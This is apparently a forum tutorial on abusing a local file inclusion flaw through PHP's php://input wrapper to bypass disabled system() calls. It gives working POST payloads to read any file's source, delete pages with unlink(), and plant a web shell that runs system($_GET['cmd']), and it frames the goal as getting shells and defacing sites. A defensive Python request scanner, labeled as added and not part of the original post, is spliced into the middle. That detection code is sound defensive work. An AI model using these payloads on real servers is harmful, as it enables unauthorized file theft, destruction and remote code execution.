Requirements:
Site vulnerable to LFI
Shell
PHP wrappers mustn't be disabled
Brain (that can be useful)
Introduction:
You found an LFI vulnerability on a website and you want to get a shell on it, but the server configuration doesn't allow the use of system(), shell_exec(), etc.
Error you should see:
Code:
PHP Warning: system() has been disabled for security reasons in /home/dir/public_html/index.php on line 374
So you can use the /proc/self/environ method, but if it doesn't work you cannot upload your shell or your deface page with the system() function.
Exploitation:
The purpose of this method is to inject PHP code into the page so that the server returns the data you expect.
Another way to read the source:
Example of URL:
Code:
http://www.2cto.com/index.php?page=php://input
The php://input part is very important.
Open your HackBar, click "Load URL", then click "Enable Post Data" and write this in "Post Data":
PHP Code:
<?
echo "<textarea>" . file_get_contents('namefile.EXT') . "</textarea>";
?>
The server will return the source code, PHP included, inside a textarea; I use a textarea because on some websites the raw output is very unreadable.
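From the defender's side, the requests this post describes are easy to spot: a file-include parameter carrying a stream wrapper (php://input, data://), a traversal sequence, or /proc/self/environ, optionally paired with a POST body that contains a PHP open tag and a file or process function. The following is an added example, not code from the original post: scan_request() and scan_requests() are hypothetical helper names, and the request records are constructed to mimic what a reverse proxy or WAF audit log provides (method, request URI and, for POST, the raw body). It decodes parameters twice so that double-URL-encoded traversal normalises as well.

```python
"""Flag LFI and PHP-wrapper abuse in web request records.

Added example, not part of the original post. The request records below are
constructed and mimic what a reverse proxy, WAF or ModSecurity-style audit log
provides: method, request URI and, for POST requests, the raw body.
scan_request() and scan_requests() are hypothetical helper names.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Stream wrappers that have no business appearing in a file-include parameter.
WRAPPER_RE = re.compile(r"^\s*(php|data|expect|phar|zip|file|glob|ftp|https?)://", re.I)
# "../" or "..\" anywhere in the value, including at the very start.
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# /proc/self/environ and /proc/self/fd/N are the classic env/log-poisoning targets.
PROC_RE = re.compile(r"/proc/self/(environ|fd/\d+)", re.I)
# A PHP open tag in a POST body only matters when php://input is being included.
PHP_TAG_RE = re.compile(r"<\?(php\b|=|\s)", re.I)
DANGEROUS_RE = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert|"
    r"fwrite|fputs|file_put_contents|unlink|file_get_contents|include|require)\s*\(",
    re.I,
)


def scan_request(method: str, uri: str, body: str = "") -> list:
    """Return the list of finding tags for one request; an empty list means clean."""
    findings = []
    for name, once_decoded in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        # parse_qsl already decoded once; decode again so %252e%252e%252f (double-encoded ../) normalises too.
        value = unquote(once_decoded)
        if "\x00" in value:
            findings.append(f"nullbyte:{name}")
        if WRAPPER_RE.search(value):
            findings.append(f"wrapper:{name}")
        if TRAVERSAL_RE.search(value):
            findings.append(f"traversal:{name}")
        if PROC_RE.search(value):
            findings.append(f"proc_self:{name}")
    # php://input executes the POST body, so inspect the body once a wrapper has been seen.
    wrapper_seen = any(f.startswith("wrapper:") for f in findings)
    if method.upper() == "POST" and body and wrapper_seen:
        if PHP_TAG_RE.search(body):
            findings.append("body:php_tag")
        hit = DANGEROUS_RE.search(body)
        if hit:
            findings.append("body:" + hit.group(1).lower())
    return findings


def scan_requests(records) -> list:
    """Run scan_request over (method, uri, body) tuples; return [(index, findings)] for flagged ones."""
    flagged = []
    for index, (method, uri, body) in enumerate(records):
        findings = scan_request(method, uri, body)
        if findings:
            flagged.append((index, findings))
    return flagged


# Constructed sample traffic: one benign request, then the patterns from the post.
SAMPLE_REQUESTS = [
    ("GET", "/index.php?page=about", ""),
    ("POST", "/index.php?page=php://input", "<? echo file_get_contents('config.php'); ?>"),
    ("GET", "/index.php?page=../../../../proc/self/environ", ""),
    ("GET", "/index.php?page=%252e%252e%252f%252e%252e%252fconfig.php", ""),
    ("POST", "/index.php?page=php://input", "<?php system($_GET['cmd']); ?>"),
]

if __name__ == "__main__":
    for index, findings in scan_requests(SAMPLE_REQUESTS):
        print(index, SAMPLE_REQUESTS[index][1], findings)
```

The body checks are deliberately gated on a wrapper being present in the query string: a PHP open tag in an ordinary form post (a pastebin, a CMS editor) is not by itself an attack, but combined with page=php://input it is exactly the read/delete/write primitive this post walks through.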
Another way to delete a page:
Same steps as above, but in "Post Data" you will write:
PHP Code:
<?
unlink('namefile.EXT');
?>
Another way to upload your shell:
If you have no knowledge of PHP this will be a little difficult, so pay attention.
This time in "Post Data" you will write:
PHP Code:
<?
$f = fopen('shell.php', 'a+');
fwrite($f, '**'); // I used fwrite because fputs was disabled
fclose($f);
?>
** = some explanation is needed: instead of ** put your code, but be careful, I'm sure your code contains a lot of quotes and you will have to escape them.
So I recommend using an encoding that is decoded when the PHP code is executed, because the encoded form won't contain quotes.
An example:
PHP Code:
<?
$f = fopen('shell.php', 'a+');
fwrite($f, '<?php system($_GET[\'cmd\']); ?>'); // I used fwrite because fputs was disabled
fclose($f);
?>
The real code that is created in the page is:
PHP Code:
<?php
system($_GET['cmd']);
?>
Go to the page and use the script like this:
So I think that's all; I hope it will be helpful and you liked it. If you don't understand something or just want to talk about this method, PM me.
From just fuck it!